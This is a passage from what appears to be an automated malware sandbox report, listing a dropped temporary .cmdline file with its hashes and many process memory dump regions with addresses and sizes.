                                                                                          8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                          SHA512

                                                                                          22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\ykgudnrt\ykgudnrt.cmdline

                                                                                          Filesize

                                                                                          607B

                                                                                          MD5

                                                                                          7ad19811223b92c5be6733d3be016ffa

                                                                                          SHA1

                                                                                          eb93ec5de2658f6aa23af838a5f3c2649aa088ba

                                                                                          SHA256

                                                                                          eeba17ba2bae75ef6768d213a274e8192d45dcff55a1d0554ead1b4bc29a6371

                                                                                          SHA512

                                                                                          17150cf74e78357d1faed937e935682c47efe50cbec003dd9ccf1e4dd8487009e414a792ea41433c5661c8c867f99157ea033aaeab27ba5dce34a0c905999d53

                                                                                        • memory/4068-90-0x0000018545510000-0x0000018545532000-memory.dmp

                                                                                          Filesize

                                                                                          136KB

                                                                                        • memory/4544-72-0x00007FF94B500000-0x00007FF94BA33000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/4544-75-0x00007FF95E8C0000-0x00007FF95E8E5000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/4544-68-0x00007FF94BA40000-0x00007FF94BB0E000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/4544-32-0x00007FF964DE0000-0x00007FF964DEF000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/4544-71-0x00007FF94BF40000-0x00007FF94C605000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/4544-65-0x00007FF960260000-0x00007FF96026D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/4544-66-0x00007FF95A7F0000-0x00007FF95A823000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/4544-295-0x00007FF94BA40000-0x00007FF94BB0E000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/4544-60-0x00007FF94BB10000-0x00007FF94BC8F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/4544-58-0x00007FF95AF80000-0x00007FF95AFA4000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/4544-106-0x00007FF94BB10000-0x00007FF94BC8F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/4544-232-0x0000026A3C8D0000-0x0000026A3CE03000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/4544-74-0x0000026A3C8D0000-0x0000026A3CE03000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/4544-78-0x00007FF95FFD0000-0x00007FF95FFDD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/4544-129-0x00007FF95A7F0000-0x00007FF95A823000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/4544-247-0x00007FF94B500000-0x00007FF94BA33000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/4544-77-0x00007FF9593E0000-0x00007FF9593F4000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/4544-80-0x00007FF94AE20000-0x00007FF94AF3A000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/4544-64-0x00007FF95AF60000-0x00007FF95AF79000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/4544-54-0x00007FF95B2C0000-0x00007FF95B2ED000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/4544-231-0x00007FF94BA40000-0x00007FF94BB0E000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/4544-105-0x00007FF95AF80000-0x00007FF95AFA4000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/4544-56-0x00007FF95AFB0000-0x00007FF95AFCA000-memory.dmp

                                                                                          Filesize

                                                                                          104KB

                                                                                        • memory/4544-30-0x00007FF95E8C0000-0x00007FF95E8E5000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/4544-25-0x00007FF94BF40000-0x00007FF94C605000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/4544-270-0x00007FF94BF40000-0x00007FF94C605000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/4544-279-0x00007FF95A7F0000-0x00007FF95A823000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/4544-276-0x00007FF94BB10000-0x00007FF94BC8F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/4544-271-0x00007FF95E8C0000-0x00007FF95E8E5000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/4544-285-0x00007FF94BF40000-0x00007FF94C605000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/4544-294-0x00007FF95A7F0000-0x00007FF95A823000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/4544-303-0x00007FF94AE20000-0x00007FF94AF3A000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/4544-302-0x00007FF9593E0000-0x00007FF9593F4000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/4544-301-0x00007FF94B500000-0x00007FF94BA33000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/4544-300-0x00007FF95FFD0000-0x00007FF95FFDD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/4544-293-0x00007FF960260000-0x00007FF96026D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/4544-292-0x00007FF95AF60000-0x00007FF95AF79000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/4544-291-0x00007FF94BB10000-0x00007FF94BC8F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/4544-290-0x00007FF95AF80000-0x00007FF95AFA4000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/4544-289-0x00007FF95AFB0000-0x00007FF95AFCA000-memory.dmp

                                                                                          Filesize

                                                                                          104KB

                                                                                        • memory/4544-288-0x00007FF95B2C0000-0x00007FF95B2ED000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/4544-287-0x00007FF964DE0000-0x00007FF964DEF000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/4544-286-0x00007FF95E8C0000-0x00007FF95E8E5000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/4664-155-0x000001B96E390000-0x000001B96E398000-memory.dmp

                                                                                          Filesize

                                                                                          32KB